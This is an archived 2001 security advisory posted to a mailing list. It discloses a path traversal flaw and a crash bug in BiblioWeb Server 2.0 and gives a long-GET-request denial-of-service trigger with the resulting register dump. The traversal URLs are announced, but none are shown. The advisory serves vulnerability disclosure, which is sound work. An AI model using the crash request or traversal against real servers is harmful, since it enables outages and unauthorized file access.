Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
Date: Mon Feb 05 2001 - 14:40:22 CST
To Ben Greenbaum:
Please post this advisory instead of the last. I needed to
make a minor change to the 'Vendor Status' section. Thanks.
Vulnerabilities in BiblioWeb Server
BiblioWeb Server 2.0 is a web server available from
http://www.biblioscape.com. A vulnerability exists which allows a remote
user to break out of the web root using relative paths (ie: '..', '...').
A second vulnerability allows a remote attacker to crash the server.
To break out of the web root, use the following URLs:
To crash the server, telnet to port 80, and send:
GET /[a lot of 'A's]
The server crashes with the following dump:
BIBLIOWEB caused an invalid page fault in
module BIBLIOWEB.EXE at 017f:004069fd.
EAX=00408b70 CS=017f EIP=004069fd EFLGS=00010283
EBX=00408b70 SS=0187 ESP=0415fe88 EBP=04160418
ECX=00000001 DS=0187 ESI=04160414 FS=58df
EDX=04160414 ES=0187 EDI=04160518 GS=0000
Bytes at CS:EIP:
68 00 04 00 00 8d 44 24 04 50 8b 43 04 50 8b 03
No quick fix is possible.
CG Information was contacted via <supportbiblioscape.com> on Monday,
January 29, 2001. No reply was received.
- Joe Testa ( e-mail: joetestahushmail.com / AIM: LordSpankatron
IMPORTANT NOTICE: If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages.
Get your FREE, totally secure email address at http://www.hushmail.com.